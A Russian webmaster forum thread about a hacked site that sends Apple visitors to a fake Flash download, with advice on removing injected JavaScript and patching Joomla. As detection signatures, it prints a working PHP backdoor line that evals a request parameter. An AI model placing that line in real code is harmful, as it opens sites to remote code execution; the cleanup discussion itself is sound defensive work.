- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, уважаемые форумчане.
При попытке открыть сайт на любом Apple устройстве сайт перекидывает на страницу загрузки Адоб Флэш. Но! На сайте совершенно точно нету никаких флэш-элементов.
Методом последовательного удаления кусков вёстки обнаружил, что сайт перекидывает на загрузку Флэша только при попытке загрузить какой-либо .js файл, например modernizr-2.6.2.min.js.
Что за парадокс, как вылечить?
не парадокс, сайт взломан, в файлах добавлен мобильный редирект...
не парадокс, сайт взломан, в файлах добавлен мобильный редирект...
Угу, так и оказалось.
Причём сайт, похоже, взломан через timymce.
Переводит на некий online2you.org
Будем лечить.
Вирусни оказалось даже две.
Одну удалил по точному вхождению строки, зашёл через SSH и ввёл команду
find /sitedir -name '*.js' -exec sed -i 's/textdodelete//' {} \;
Вторую этой же командой, но сделал проверку регулярным выражением по вхождению определённого текста в строку. При нахождении строка удаляется целиком
find /sitedir -name '*.js' -exec sed -i '/7kSKlBXYjNXZfhSZwF2YzVm/d' {} \;
а теперь осталось найти причину: "чем" напостили и как это "чем" на сайте оказалось (99% оно есть и грязь повторится)...
При нахождении строка удаляется целиком
Видимо, ещё не попадались варианты, которые дописываются в уже имеющуюся строку.. после удаления которой всё поползёт..
Присоединюсь к kgtu5 - почитайте, проверьтесь..
А теперь проверить php файлы на наличие двух строк
eval(gzinflate(base64_decode('
if (isset($_REQUEST['en'])) eval(stripslashes($_REQUEST['en']));
Это источники. Судя по сигнатурам в js, только что боролся с тем же вирем.
Посмотреть дату и время создания файлов. Посмотреть в логах дырку.
Php файлы надо удалить обязательно иначе js опять заразят.
Весь алгоритм расписывал тут.
И надо обновить Джумлу и плагины. Лезет где то в дырку Джумлы.